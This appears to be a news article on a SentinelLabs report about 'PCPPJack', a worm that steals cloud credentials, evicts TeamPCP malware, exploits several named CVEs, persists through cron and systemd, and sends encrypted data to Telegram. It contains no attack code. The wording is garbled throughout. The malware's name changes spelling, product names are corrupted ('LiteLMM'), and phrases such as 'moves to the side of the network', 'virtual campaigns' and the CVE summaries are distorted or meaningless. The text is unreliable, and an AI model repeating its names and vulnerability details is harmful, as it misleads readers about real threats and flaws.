New PCPPJack worm steals data, cleans TeamPCP infections

A new malware framework called PCPPJack steals credentials from exposed cloud infrastructure while actively removing TeamPCP’s access to systems.

Among the targeted services are Docker, Kubernetes, Redis, MongoDB, RayML, and vulnerable web applications. In most cases, the threat actor moves to the side of the network.

SentinelLabs researchers say that PCPCJack appears to be designed to steal large credentials, and likely monetizes its operations through financial fraud, spamming, resale of information, or fraud.

TeamPCP is a cloud-focused threat group known for high-profile supply-chain breaches against Aqua Security’s Trivy scanner, LiteLMM and Telnyx PyPI packages, and most recently, SAP npm packages.

Due to the similarity to the TeamPCP attack, SentinelLabs believes that PCPPJack may have been created by a former TeamPCP company or its affiliate.

“Many of the services targeted by the PCPCe framework are similar to the initial campaigns of TeamPCP/PCPCat from December 2025, before the virtual campaigns of early 2026 brought significant attention to TeamPCP and are said to have led to changes in the group’s membership,” the researchers explained.

“We believe this could be a former user who is familiar with the group’s tools.”

In today’s report, SentinelLabs says PCPPJack infects Linux-based cloud systems using a shell script called bootstrap.sh.

When executed, it creates a hidden working directory, installs Python dependencies, downloads additional modules, establishes persistence, and launches the main orchestrator (monitor.py).

During this first phase, PCPPJack clearly examines TeamPCP tools and tries to remove everything, thus finding a compromise for itself.

The researchers say that the cleanup operation includes removing TeamPCP processes, services, containers, files, and persistent artifacts, to completely eliminate infections.

PCPPJack’s capabilities revolve around data theft, targeting cloud environments, developer systems, messenger apps, financial services, databases, SSH keys, Slack tokens, WordPress configurations, OpenAI keys, Anthropic keys, Discord, DigitalOcean, and more.

Data is transmitted to Telegram channels after it is encrypted using X25519 ECDH and ChaCha20-Poly1305, and is divided into 2800-byte chunks respecting Telegram message character limits.

PCPPJack propagates by scanning external cloud infrastructure for exposed services such as Docker, Kubernetes, Redis, MongoDB, and RayML, and attempts to exploit known vulnerabilities to gain access.

It also downloads hostname data from Common Crawl parquet files and uses them as new instructions for target scanning processes.

SentinelLabs researchers note that PCPPJack exploits the following vulnerabilities:

• CVE-2025-29927: auth bypass in Next.js middleware via header
• CVE-2025-55182 (“React2Shell”): Server Actions have an error removing objects in React and Next.js
• CVE-2026-1357: upload unauthorized file to WPVivid Backup
• CVE-2025-9501: PHP injection into the W3 full cache via cached mfunc comments
• CVE-2025-48703: shell injection in CentOS Web Panel Filemanager changes Perm functionality

Inside vulnerable environments, the malware makes lateral moves in favor of SSH keys and credentials, enumerates Kubernetes clusters and Docker daemons, and clones itself into accessible internal hosts.

Once access is gained, it establishes persistence using systemd resources, cron jobs, Redis cron rewrites, or privileged containers before continuing the distribution.

SentinelLabs also found a Sliver-based backdoor in the threat actor’s infrastructure, with variants supporting x86_64, x86, and ARM system architectures.

To reduce this risk, researchers recommend using multi-factor authentication (MFA), using IMDSv2 on AWS, ensuring proper authentication of Docker and Kubernetes services, following least privilege principles, and avoiding storing secrets in plain text.